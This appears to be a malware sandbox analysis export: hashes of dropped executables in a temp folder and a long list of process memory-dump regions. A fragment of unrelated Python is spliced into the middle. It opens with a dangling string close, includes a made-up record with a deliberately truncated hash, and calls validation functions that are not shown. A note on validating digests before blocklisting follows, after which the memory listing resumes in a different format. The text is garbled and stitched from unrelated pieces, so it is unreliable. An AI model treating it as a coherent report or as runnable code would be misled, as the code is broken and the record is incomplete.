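C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
""" + "\n".join([
    "-",
    r"C:\Users\Admin\AppData\Local\Temp\truncated_example.exeMD5",   # made-up record
    "0" * 32,
    "SHA1" + "0" * 40,
    "SHA256deadbeef",                                                # 8 hex chars, 64 expected
    "SHA512" + "0" * 128,
])

if __name__ == "__main__":
    good, bad = validate(parse_dropped_files(SAMPLE_EXPORT))
    iocs = consolidate(good)
    print(f"{len(iocs)} distinct SHA256 from {len(good)} valid records; {len(bad)} rejected")
    for digest, paths in renamed_copies(iocs).items():
        print(digest, "->", ", ".join(paths))
```

Feed real exports through `validate` before `consolidate`: a truncated digest that slips into a blocklist will never match anything and silently gives the impression that the indicator is covered.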
memory/668-348-0x0000000000000000-mapping.dmp
memory/668-483-0x0000000006060000-0x0000000006061000-memory.dmp  4KB
memory/748-176-0x0000000000000000-mapping.dmp
memory/784-190-0x0000000000000000-mapping.dmp
memory/784-271-0x0000000005690000-0x00000000057D3000-memory.dmp  1.3MB
memory/884-296-0x0000000000000000-mapping.dmp
memory/908-602-0x0000000000400000-0x0000000000409000-memory.dmp  36KB
memory/1112-224-0x0000000000CE0000-0x0000000000CE1000-memory.dmp  4KB
memory/1112-242-0x000000001BA30000-0x000000001BA32000-memory.dmp  8KB
memory/1112-210-0x0000000000000000-mapping.dmp
memory/1116-246-0x0000000005210000-0x0000000005211000-memory.dmp  4KB
memory/1116-244-0x0000000005040000-0x0000000005041000-memory.dmp  4KB
memory/1116-250-0x00000000057D0000-0x00000000057D1000-memory.dmp  4KB
memory/1116-209-0x0000000000000000-mapping.dmp
memory/1116-240-0x00000000050C0000-0x00000000050C1000-memory.dmp  4KB
memory/1116-232-0x0000000000750000-0x0000000000751000-memory.dmp  4KB
memory/1120-279-0x0000000006660000-0x0000000006661000-memory.dmp  4KB
memory/1120-263-0x0000000006310000-0x0000000006311000-memory.dmp  4KB
memory/1120-211-0x0000000000000000-mapping.dmp
memory/1120-251-0x0000000000FB0000-0x0000000000FB1000-memory.dmp  4KB
memory/1120-262-0x00000000064F0000-0x00000000064F1000-memory.dmp  4KB
memory/1120-270-0x00000000065F0000-0x00000000065F1000-memory.dmp  4KB
memory/1120-261-0x00000000063E0000-0x00000000063E1000-memory.dmp  4KB
memory/1120-260-0x00000000062B0000-0x00000000062B1000-memory.dmp  4KB
memory/1120-258-0x0000000006840000-0x0000000006841000-memory.dmp  4KB
memory/1120-274-0x0000000006210000-0x0000000006211000-memory.dmp  4KB
memory/1128-182-0x0000000000000000-mapping.dmp
memory/1208-621-0x0000000004EE0000-0x00000000054F8000-memory.dmp  6.1MB
memory/1484-448-0x0000000000D40000-0x0000000000D50000-memory.dmp  64KB
memory/1484-451-0x0000000000D60000-0x0000000000D72000-memory.dmp  72KB
memory/1540-184-0x0000000000000000-mapping.dmp
memory/1680-543-0x0000000004C00000-0x0000000004C01000-memory.dmp  4KB
memory/2072-170-0x0000000000000000-mapping.dmp
memory/2076-444-0x0000000000400000-0x0000000000414000-memory.dmp  80KB
memory/2220-191-0x0000000000000000-mapping.dmp
memory/2756-167-0x000000006B280000-0x000000006B2A6000-memory.dmp  152KB
memory/2756-162-0x0000000064940000-0x0000000064959000-memory.dmp  100KB
memory/2756-149-0x0000000000000000-mapping.dmp
memory/2756-163-0x000000006B440000-0x000000006B4CF000-memory.dmp  572KB
memory/2756-168-0x0000000064940000-0x0000000064959000-memory.dmp  100KB
memory/2756-165-0x000000006FE40000-0x000000006FFC6000-memory.dmp  1.5MB
memory/2756-166-0x0000000064940000-0x0000000064959000-memory.dmp  100KB
memory/2756-164-0x0000000064940000-0x0000000064959000-memory.dmp  100KB
memory/3212-646-0x00000000041F0000-0x0000000004205000-memory.dmp  84KB
memory/3336-196-0x0000000000000000-mapping.dmp
memory/3540-146-0x0000000000000000-mapping.dmp
memory/3588-212-0x0000000000000000-mapping.dmp
memory/3588-231-0x0000000000400000-0x000000000042C000-memory.dmp  176KB
memory/3628-528-0x00000000020A0000-0x00000000020A1000-memory.dmp  4KB
memory/3736-198-0x0000000000000000-mapping.dmp
memory/3736-225-0x00000000002D0000-0x00000000002D1000-memory.dmp  4KB
memory/3736-241-0x000000001B0E0000-0x000000001B0E2000-memory.dmp  8KB
memory/3736-651-0x0000000004EF0000-0x0000000004EF1000-memory.dmp  4KB
memory/3856-238-0x0000000007392000-0x0000000007393000-memory.dmp  4KB
memory/3856-248-0x0000000008290000-0x0000000008291000-memory.dmp  4KB
memory/3856-229-0x0000000007300000-0x0000000007301000-memory.dmp  4KB
memory/3856-235-0x0000000007390000-0x0000000007391000-memory.dmp  4KB
memory/3856-625-0x0000000007395000-0x0000000007397000-memory.dmp  8KB
memory/3856-259-0x0000000008630000-0x0000000008631000-memory.dmp  4KB
memory/3856-257-0x0000000008590000-0x0000000008591000-memory.dmp  4KB
memory/3856-256-0x0000000008520000-0x0000000008521000-memory.dmp  4KB
memory/3856-498-0x000000007F3A0000-0x000000007F3A1000-memory.dmp  4KB
memory/3856-236-0x00000000079D0000-0x00000000079D1000-memory.dmp  4KB
memory/3856-189-0x0000000000000000-mapping.dmp
memory/3856-255-0x00000000081E0000-0x00000000081E1000-memory.dmp  4KB
memory/3856-254-0x0000000008180000-0x0000000008181000-memory.dmp  4KB
memory/3856-332-0x0000000008B10000-0x0000000008B11000-memory.dmp  4KB
memory/3864-213-0x0000000000000000-mapping.dmp
memory/3864-513-0x00000000006F0000-0x00000000006F9000-memory.dmp  36KB
memory/3884-298-0x0000000000000000-mapping.dmp
memory/3904-193-0x0000000000000000-mapping.dmp
memory/3976-331-0x0000000000440000-0x0000000000441000-memory.dmp  4KB
memory/3976-326-0x0000000000000000-mapping.dmp
memory/3976-344-0x000000001B190000-0x000000001B192000-memory.dmp  8KB
memory/4120-358-0x0000000000000000-mapping.dmp
memory/4132-354-0x0000000000000000-mapping.dmp
memory/4132-459-0x0000000005460000-0x0000000005461000-memory.dmp  4KB
memory/4184-172-0x0000000000000000-mapping.dmp
memory/4212-174-0x0000000000000000-mapping.dmp
memory/4264-575-0x00000000053A0000-0x00000000059B8000-memory.dmp  6.1MB
memory/4376-208-0x0000000000000000-mapping.dmp
memory/4388-178-0x0000000000000000-mapping.dmp
-
memory/4520-188-0x0000000000000000-mapping.dmp
-
memory/4532-186-0x0000000000000000-mapping.dmp
-
memory/4540-351-0x0000000000000000-mapping.dmp
-
memory/4540-381-0x00000000023A0000-0x00000000023D5000-memory.dmpFilesize
212KB
-
memory/4588-413-0x0000000000510000-0x0000000000540000-memory.dmpFilesize
192KB
-
memory/4588-201-0x0000000000000000-mapping.dmp
-
memory/4608-202-0x0000000000000000-mapping.dmp
-
memory/4672-366-0x0000000000000000-mapping.dmp
-
memory/4676-169-0x0000000000000000-mapping.dmp
-
memory/4732-494-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4868-200-0x0000000000000000-mapping.dmp
-
memory/4932-355-0x0000000000000000-mapping.dmp
-
memory/4944-583-0x0000000004B90000-0x0000000004B91000-memory.dmpFilesize
4KB
-
memory/4992-207-0x0000000000000000-mapping.dmp
-
memory/5012-180-0x0000000000000000-mapping.dmp
-
memory/5024-346-0x0000000000000000-mapping.dmp
-
memory/5140-365-0x0000000000000000-mapping.dmp
-
memory/5232-345-0x0000000000000000-mapping.dmp
-
memory/5236-360-0x0000000000000000-mapping.dmp
-
memory/5236-560-0x0000000000EC0000-0x0000000000F96000-memory.dmpFilesize
856KB
-
memory/5260-297-0x0000000000000000-mapping.dmp
-
memory/5284-363-0x0000000000000000-mapping.dmp
-
memory/5284-418-0x00000000050B0000-0x0000000005336000-memory.dmpFilesize
2.5MB
-
memory/5296-228-0x0000000000000000-mapping.dmp
-
memory/5304-227-0x0000000000000000-mapping.dmp
-
memory/5304-609-0x0000000000600000-0x0000000000648000-memory.dmpFilesize
288KB
-
memory/5372-234-0x0000000000000000-mapping.dmp
-
memory/5372-243-0x00000000020C0000-0x00000000020C1000-memory.dmpFilesize
4KB
-
memory/5432-453-0x00000000051C0000-0x00000000051C1000-memory.dmpFilesize
4KB
-
memory/5432-361-0x0000000000000000-mapping.dmp
-
memory/5512-552-0x0000000002FD0000-0x0000000002FFF000-memory.dmpFilesize
188KB
-
memory/5512-362-0x0000000000000000-mapping.dmp
-
memory/5608-247-0x0000000000000000-mapping.dmp
-
memory/5648-486-0x00000000032A0000-0x00000000032A2000-memory.dmpFilesize
8KB
-
memory/5648-318-0x0000000000A90000-0x0000000000A91000-memory.dmpFilesize
4KB
-
memory/5648-312-0x0000000000000000-mapping.dmp
-
memory/5676-364-0x0000000000000000-mapping.dmp
-
memory/5676-432-0x00000000058A0000-0x00000000058A1000-memory.dmpFilesize
4KB
-
memory/5680-367-0x0000000000000000-mapping.dmp
-
memory/5680-533-0x0000000005720000-0x0000000005721000-memory.dmpFilesize
4KB
-
memory/5696-315-0x00000000058A0000-0x0000000005EB8000-memory.dmpFilesize
6.1MB
-
memory/5696-284-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5696-280-0x0000000000000000-mapping.dmp
-
memory/5728-359-0x0000000000000000-mapping.dmp
-
memory/5728-595-0x0000000000400000-0x0000000004A15000-memory.dmpFilesize
70.1MB
-
memory/5728-463-0x0000000006790000-0x000000000ACBE000-memory.dmpFilesize
69.2MB
-
memory/5840-321-0x0000000000000000-mapping.dmp
-
memory/5840-407-0x0000000005A20000-0x0000000005A21000-memory.dmpFilesize
4KB
-
memory/5848-265-0x0000000000000000-mapping.dmp
-
memory/5864-349-0x0000000000000000-mapping.dmp
-
memory/5884-289-0x0000000001510000-0x0000000001512000-memory.dmpFilesize
8KB
-
memory/5884-269-0x0000000000000000-mapping.dmp
-
memory/5928-273-0x0000000000000000-mapping.dmp
-
memory/5928-330-0x0000000004790000-0x0000000004791000-memory.dmpFilesize
4KB
-
memory/5928-334-0x0000000007710000-0x0000000007711000-memory.dmpFilesize
4KB
-
memory/5928-336-0x0000000007E10000-0x0000000007E11000-memory.dmpFilesize
4KB
-
memory/5928-314-0x0000000000E30000-0x0000000000E31000-memory.dmpFilesize
4KB
-
memory/5928-325-0x0000000004750000-0x000000000478F000-memory.dmpFilesize
252KB
-
memory/5928-339-0x0000000004F30000-0x0000000004F31000-memory.dmpFilesize
4KB
-
memory/5928-304-0x0000000000510000-0x0000000000511000-memory.dmpFilesize
4KB
-
memory/5960-335-0x0000000000000000-mapping.dmp
-
memory/5960-347-0x00000000015A0000-0x00000000015B2000-memory.dmpFilesize
72KB
-
memory/5960-343-0x0000000001580000-0x0000000001590000-memory.dmpFilesize
64KB
-
memory/5988-277-0x0000000000000000-mapping.dmp
-
memory/6000-278-0x0000000000000000-mapping.dmp
-
memory/6000-283-0x0000000000E50000-0x0000000000E51000-memory.dmpFilesize
4KB
-
memory/6040-305-0x0000000000C20000-0x0000000000C21000-memory.dmpFilesize
4KB
-
memory/6040-295-0x00000000002F0000-0x00000000002F1000-memory.dmpFilesize
4KB
-
memory/6040-308-0x00000000023F0000-0x00000000023FC000-memory.dmpFilesize
48KB
-
memory/6040-319-0x0000000004E60000-0x0000000004E61000-memory.dmpFilesize
4KB
-
memory/6040-323-0x0000000002480000-0x0000000002481000-memory.dmpFilesize
4KB
-
memory/6040-286-0x0000000000000000-mapping.dmp
-
memory/6160-569-0x00000000059D0000-0x00000000059D1000-memory.dmpFilesize
4KB
-
memory/6168-425-0x0000000005520000-0x0000000005521000-memory.dmpFilesize
4KB
-
memory/6168-478-0x0000000002DF0000-0x0000000002DF1000-memory.dmpFilesize
4KB
-
memory/6184-456-0x0000000005590000-0x0000000005591000-memory.dmpFilesize
4KB
-
memory/6204-615-0x0000000005A80000-0x0000000005D06000-memory.dmpFilesize
2.5MB
-
memory/6220-520-0x0000000005450000-0x0000000005451000-memory.dmpFilesize
4KB
-
memory/6220-508-0x0000000005670000-0x0000000005671000-memory.dmpFilesize
4KB
-
memory/6300-469-0x0000000002B30000-0x0000000002B32000-memory.dmpFilesize
8KB
-
memory/6380-589-0x0000000000920000-0x0000000000929000-memory.dmpFilesize
36KB
-
memory/6676-426-0x0000000005600000-0x0000000005886000-memory.dmpFilesize
2.5MB
-
memory/6716-439-0x0000000005350000-0x00000000055D6000-memory.dmpFilesize
2.5MB
-
memory/6908-423-0x000000001B350000-0x000000001B352000-memory.dmpFilesize
8KB
-
memory/6920-630-0x000000001AF60000-0x000000001AF62000-memory.dmpFilesize
8KB
-
memory/6984-473-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/7064-501-0x0000000002E50000-0x0000000002E51000-memory.dmpFilesize
4KB